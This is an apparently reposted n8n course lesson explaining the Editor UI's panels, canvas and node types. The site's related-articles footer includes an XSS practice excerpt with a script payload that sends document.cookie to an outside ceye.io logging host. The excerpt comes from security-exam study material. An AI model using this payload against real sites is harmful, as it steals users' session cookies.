https://docs.n8n.io/courses/

文章目录

  • Navigating the Editor UI
    • Getting started
    • Editor UI settings
      • Left-side panel
      • Top bar
      • Canvas
    • Nodes
      • Finding nodes
      • Adding nodes
      • Node buttons
    • Summary

Navigating the Editor UI

In this lesson you will learn how to navigate the Editor UI. We will walk through the canvas and show you what each icon means and where to find things you will need while building workflows in n8n.

editor (n8n)
The n8n editor UI allows you to create and manage workflows. The main area is the canvas, where you can compose workflows by adding, configuring, and connecting nodes. The side and top panels allow you to access other areas of the UI like credentials, templates, variables, executions, and more.

canvas (n8n):
The canvas is the main interface for building workflows in n8n’s editor UI. You use the canvas to add and connect nodes to compose workflows.

n8n version
course is based on n8n version 1.82.1. In other versions, some user interfaces might look different, but this shouldn’t impact the core functionality.

Getting started

Begin by setting up n8n.

We recommend starting with n8n Cloud, a hosted solution that doesn’t require installation and includes a free trial.

Alternative set up
If n8n Cloud isn’t a good option for you, you can self-host with Docker. This is an advanced option recommended only for technical users familiar with hosting services, Docker, and the command line.

For more details on the different ways to set up n8n, see our platforms documentation.

Once you have n8n running, open the Editor UI in a browser window. Log in to your n8n instance. Select Overview and then Create Workflow to view the main canvas.

It should look like this:

在这里插入图片描述

Editor UI settings

The editor UI is the web interface where you build workflows. You can access all your workflows and credentials, as well as support pages, from the Editor UI.

credential (n8n):
In n8n, credentials store authentication information to connect with specific apps and services. After creating credentials with your authentication information (username and password, API key, OAuth secrets, etc.), you can use the associated app node to interact with the service.

Left-side panel

On the left side of the Editor UI, there is a panel which contains the core functionalities and settings for managing your workflows. Expand and collapse it by selecting the small arrow icon.

在这里插入图片描述

The panel contains the following sections:

  • Overview: Contains all the workflows and credentials you have access to. During this course, create new workflows here.
    在这里插入图片描述

  • Projects: (Not available on Community edition) Projects group workflows and credentials. You can assign roles to users in a project to control what they can do in a project. A Personal project is available by default.

    RBAC(Role-Based Access Control) role types:
    Within projects, there are three user roles: Admin, Editor, and Viewer. These roles control what the user can do in a project. A user can have different roles within different projects.
    在这里插入图片描述

  • Admin Panel: n8n Cloud only. Access your n8n instance usage, billing, and version settings.
    在这里插入图片描述

  • Templates: A collection of pre-made workflows. Great place to get started with common use cases.
    在这里插入图片描述

  • Variables: Used to store and access fixed data across your workflows. This feature is available on the Pro and Enterprise Plans.
    在这里插入图片描述

  • All executions(Insights): Contains information about your workflow executions.
    在这里插入图片描述

  • Help: Contains resources around n8n product and community.
    在这里插入图片描述

  • Update(What’s New): (When updates are available) Indicator for any recent product updates.
    在这里插入图片描述

  • Settings: Under the ellipsis (...) menu by your username. Manage users and access settings for a variety of features.
    在这里插入图片描述

在这里插入图片描述

Top bar

The top bar of the Editor UI contains the following information:
在这里插入图片描述

  • Workflow Name: By default, n8n names a new workflow as “My workflow”, but you can edit the name at any time.
    在这里插入图片描述

  • + Add Tag: Tags help you organise your workflows by category, use case, or whatever is relevant for you. Tags are optional.
    在这里插入图片描述
    在这里插入图片描述

  • Inactive/active toggle: This button activates or deactivates the current workflow. By default, workflows are deactivated.
    在这里插入图片描述

  • Share: You can share and collaborate with others on workflows on the Starter, Pro, and Enterprise plans.
    在这里插入图片描述
    在这里插入图片描述

  • Save: This button saves the current workflow.
    在这里插入图片描述

  • History: Once you save your workflow, you can view previous versions here.
    在这里插入图片描述
    在这里插入图片描述

Canvas

The canvas is the gray dotted grid background in the Editor UI. It displays several icons and a node with different functionalities:
在这里插入图片描述

  • Buttons to zoom the canvas to fit the screen, zoom in or out of the canvas, and tidy up the nodes on screen.
    在这里插入图片描述

  • A button to Execute workflow once you add your first node. When you click on it, n8n executes all nodes on the canvas in sequence.
    在这里插入图片描述

  • A button with a + sign inside. This button opens the nodes panel.
    在这里插入图片描述

  • A button with a note icon inside. This button adds a sticky note to the canvas (visible when hovering on the top right + icon).
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    Sticky Notes
    Sticky Notes allow you to annotate and comment on your workflows.

    n8n recommends using Sticky Notes heavily, especially on template workflows, to help other users understand your workflow.

  • A dotted square with the text “Add first step.” This is where you add your first node.

在这里插入图片描述

Moving the canvas:
You can move the workflow canvas around in three ways:

  • Select ctrl + left-button on the canvas and move it around.
  • Select middle-button on the canvas and move it around.
  • Place two fingers on your touchpad and slide.

Don’t worry about workflow execution and activation for now; we’ll explain these concepts later on in the course.

Nodes

You can think of nodes as building blocks that serve different functions that, when put together, make up a functioning machine: an automated workflow.

Node:
A node is an individual step in your workflow: one that either (a) loads, (b) processes, or (c) sends data.

Based on their function, n8n classifies nodes into four types:

  • App or Action Nodes add, remove, and edit data; request and send external data; and trigger events in other systems. Refer to the Action nodes library for a full list of these nodes.
  • Trigger Nodes start a workflow and supply the initial data. Refer to the Trigger nodes library for a list of trigger nodes.
  • Core Nodes can be trigger or app nodes. Whereas most nodes connect to a specific external service, core nodes provide functionality such as logic, scheduling, or generic API calls. Refer to the Core Nodes library for a full list of core nodes.
  • Cluster Nodes are node groups that work together to provide functionality in a workflow, primarily for AI workflows. Instead of using a single node, you use a root node and one or more sub-nodes that extend the functionality of the node. Refer to Cluster nodes for more information.
    在这里插入图片描述

Learn more:
Refer to Node types for a more detailed explanation of all node types.

Finding nodes

You can find all available nodes in the nodes panel on the right side of the Editor UI. There are three ways in which you can open the nodes panel:

  • Click the + icon in the top right corner of the canvas.
    在这里插入图片描述

  • Click the + icon on the right side of an existing node on the canvas (the node to which you want to add another one).
    在这里插入图片描述

  • Click the tab key on your keyboard.

在这里插入图片描述

In the nodes panel, notice that when adding your first node, you will see the different trigger node categories. After you have added your trigger node, you’ll see that the nodes panel changes to show Advanced AI, Actions in an App, Data transformation, Flow, Core, and Human in the loop nodes.

If you want to find a specific node, use the search input at the top of the nodes panel.

Adding nodes

There are two ways to add nodes to your canvas:

  • Select the node you want in the nodes panel. The new node will automatically connect to the selected node on the canvas.
  • Drag and drop the node from the nodes panel to the canvas.

Node buttons

If you hover on a node, you’ll notice that three icons appear on top:
在这里插入图片描述

  • Execute the node (Play icon)
  • Deactivate/Activate the node (Power icon)
  • Delete the node (Trash icon)

There will also be an ellipsis icon, which opens a context menu containing other node options.
在这里插入图片描述

Moving a workflow:
To move a workflow around the canvas, select all nodes with your mouse or ctrl+a, select and hold on a node, then drag it to any point you want on the canvas.

Summary

In this lesson you learned how to navigate the Editor UI, what the icons mean, how to access the left-side and node panels, and how to add nodes to the canvas.

In the next lesson, you will build a mini-workflow to put into practice what you’ve learned so far.

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/bicheng/90170.shtml
繁体地址,请注明出处:http://hk.pswp.cn/bicheng/90170.shtml
英文地址,请注明出处:http://en.pswp.cn/bicheng/90170.shtml

如若内容造成侵权/违法违规/事实不符,请联系英文站点网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Altium Designer2025】电子设计自动化(EDA)软件——Altium Designer25版保姆级下载安装详细图文教程(附安装包)

今天给大家带来精心编写的Altium Designer2025版下载安装全流程图文指南,涵盖从系统准备到安装使用的完整过程。 教程严格遵循零广告、纯工具向原则,手把手教你如何正确安装并配置好这款强大的软件,让你快速进入电路设计的世界! …

智象科技赋能金融、证券行业 IT 运维

一、金融、证券行业 IT 运维现状剖析 金融、证券行业 IT 系统架构极其复杂,业务对时效性和连续性的要求近乎苛刻,同时安全监管严格,这些特点共同催生了诸多运维痛点。 系统架构复杂 :IT 系统包含多个业务系统、数据平台和网络架构…

微信小程序服务端快速对接指南(java版)

背景说明 本文档旨在描述服务端在开发微信小程序时需要对接的小程序接口,以简要的方式描述对接流程、接口文档、使用场景。有些接口需要前后端配合,本文主要描述后端接口,对于前端仅轻轻点过。开发语言为Java,但是对接的思路跟语言没有关系,应该不尽相同; 小程序上手路线…

微信小程序入门实例_____从零开始 开发一个“旅行清单 ”微信小程序

前面的博文中。我们陆续学习与开发了记账等一些实用实用小程序的开发过程,今天来打造一个适合出行场景的工具 ——“旅行清单小程序”。无论是短途游玩还是长途旅行,它都能帮你梳理需要携带的物品,避免遗漏。下面就跟着步骤,一步步…

MySQL主从同步集群(Docker搭建)

以下笔记都是基于黑马程序员的面试题写的: Mysql定位慢查询-CSDN博客 Mysql索引-CSDN博客 MySQL事物相关-CSDN博客 MySQL主从同步集群(Docker搭建)-CSDN博客 MySQL相关面试问题总结-CSDN博客 主从同步(Master-Slave Replicat…

NISP-PTE基础实操——XSS

pteXSS模拟1 <script> var img document.createElement("img");img.src"http://xxxxx.ceye.io/log?"escape(document.coo kie);document.body.appendChild(img); </script> 重放加Cookie头 pteXSS模拟2 <script type"text/javasc…

基于网络爬虫的在线医疗咨询数据爬取与医疗服务分析系统,技术采用django+朴素贝叶斯算法+boostrap+echart可视化

摘要 为了发挥互联网医疗问询服务平台在客观衡量医疗服务质量、进一步分析和挖掘网民评论数据方面的作用&#xff0c;本文完成了互联网医疗问询数据抓取与医疗服务质量服务分析平台的主要模块应用&#xff0c;如用户登录注册、医疗服务质量数据分析与信息可视化以及用户情绪识别…

【备忘录】Ubuntu 配置 NFS

安装 NFSsudo apt-get install nfs-kernel-server rpcbind启动 NFSsudo systemctl start nfs-server查看 NFSsudo service nfs-server status

【coze扣子】第1篇:coze快速入门

文章目录coze扣子Coze优点Coze智能体快速入门1、登录进入到个人主页2、创建智能体3、智能体组成部分4、智能体的发布人设与回复逻辑LLM模型配置模型设置生成多样性(抽象程度)Top P&#xff08;话痨程度&#xff09;重复语句惩罚携带上下文轮数最大回复长度技能插件触发器定时触…

PyCharm 入门指南:起步学习、开发环境一体

PyCharm 入门指南一、前置准备&#xff1a;为什么选择 PyCharm&#xff1f; 对于 Python 初学者&#xff0c;PyCharm 是最友好的集成开发环境&#xff08;IDE&#xff09;之一。它通过智能代码提示、自动纠错、调试工具、版本控制集成等功能&#xff0c;大幅降低开发门槛。本文…

【Java企业级开发】(六)Java框架技术-Maven和MyBatis

一、Maven 1.1 非Maven项目的缺点 问题一&#xff1a; 项目中的jar包资源需要我们自己从网上下载后&#xff0c;手动导入到项目中使用&#xff0c;不好管理 问题二&#xff1a; jar包版本控制麻烦 1.2 Maven介绍 Maven是使用Java语言编写的基于项目对象模型&#xff08;POM&am…

学习秒杀系统-页面优化技术

文章目录前言页面缓存URL缓存对象缓存页面缓存取缓存手动渲染URL缓存对象缓存页面静态化&#xff0c;前后端分离&#xff08;常用&#xff09;GET POST区别如何解决超卖&#xff1f;重复卖&#xff1f;&#xff08;简单版&#xff09;静态资源优化多个JS/CSS组合&#xff0c;减…

QCC系列显示交互层的自研技术突破与实践

在音频设备智能化进程中&#xff0c;显示交互的流畅度与兼容性已成为用户体验的核心指标。传统方案中&#xff0c;TFT 彩屏与多语言适配常面临硬件驱动冲突、功耗失控、字符显示错乱等问题。作为高通平台十年级方案商&#xff0c;腾泰技术在 QCC 系列中聚焦显示交互层的自研技术…

JMeter 实现 Protobuf 加密解密

一、 .proto文件编译成.jar文件 相关依赖下载详见&#xff1a;将 message.proto 编译成 .jar文件 1.依赖于java编译环境 2.依赖protoc编译jar包 编译目录 1.创建一个根目录&#xff1a;protobuf 2.在protobuf下创建build、output、lib、src目录 lib&#xff1a;放 protobu…

发票识别在费控系统应用剖析

一、发票识别与费控系统的融合价值1.1 解决传统费控痛点效率瓶颈突破&#xff1a;将人工处理每张发票的5-8分钟缩短至秒级自动识别准确性飞跃&#xff1a;关键字段识别准确率从人工的95%提升至99%以上合规性强化&#xff1a;自动对接税务系统验真&#xff0c;虚假发票识别率提升…

Rust实战:决策树与随机森林实现

基于 Rust 实现决策树(Decision Tree)和随机森林(Random Forest)的实例 Linfa的基本定义 Linfa是意大利语中“淋巴”(lymph)的意思,在医学领域指淋巴系统相关的结构或功能。淋巴系统由淋巴管、淋巴结、脾脏等组成,负责免疫防御和体液平衡。 Linfa在生物学中的作用 …

9. isaacsim4.2教程-ROS加相机/CLOCK

在本示例中&#xff0c;我们将学习如何&#xff1a; 向场景中添加额外的相机并将其安装在机器人上 添加相机发布器&#xff08;Camera Publishers&#xff09; 通过 rostopics 发送真实的合成感知数据&#xff08;ground truth synthetic perception data&#xff09; 前提…

微信小程序171~180

1.封装购物车接口API import http from /utils/httpexport const reqAddCrt ({ goodsId, count, ...data }) > {return http.get(/cart/addToCart/${goodsId}/${count}, data) }export const reqCartList () > {return http.get(/cart/getCartList) }export const reqU…

修改 docker 容器的挂载配置(保持数据不丢的情况)

一、核心原理Docker 容器的运行时配置&#xff08;包括挂载&#xff09;是启动时确定的&#xff0c;一旦启动无法直接修改。因此&#xff0c;需通过以下步骤实现&#xff1a;保存原容器中的数据&#xff08;避免丢失&#xff09;&#xff1b;基于原镜像创建新容器&#xff0c;同…

MVCC(多版本并发控制)介绍及实现原理

一、什么是MVCC&#xff1f; MVCC&#xff08;Multi-Version Concurrency Control&#xff0c;多版本并发控制&#xff09;是数据库中用于解决并发访问问题的一种机制。它通过为数据维护多个版本&#xff0c;让读写操作在不同版本上独立进行&#xff0c;从而避免了传统锁机制中…